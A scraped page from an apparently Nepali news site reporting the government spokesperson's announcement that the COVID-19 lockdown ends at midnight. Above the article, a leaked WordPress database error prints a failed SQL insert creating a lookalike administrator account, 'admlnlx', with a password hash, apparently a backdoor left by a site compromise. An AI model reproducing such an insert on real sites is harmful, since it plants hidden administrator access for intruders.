WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BELhRhZqizqLCVTAPX2E.wjVAz983k.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 06:38:25', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाडौं । सरकारले कोरोना (कोभिड १९) को महामारी रोकथामका लागि लगाएको लकडाउन अन्त्य भएको बताएको छ ।
आज (मंगलबार) मन्त्रिपरिषदको निर्णय सार्वजनिक गर्न आयोजित पत्रकार सम्मेलनमा सरकारका प्रवक्ता तथा अर्थ र सञ्चार तथा सूचना प्रविधिमन्त्री डा. युवराज खतिवडाले चैत ११ देखि सरकारले लगाएको लकडाउन मंगलबार राति १२ बजेपछि अन्त्य हुने जानकारी दिएका हुन्
।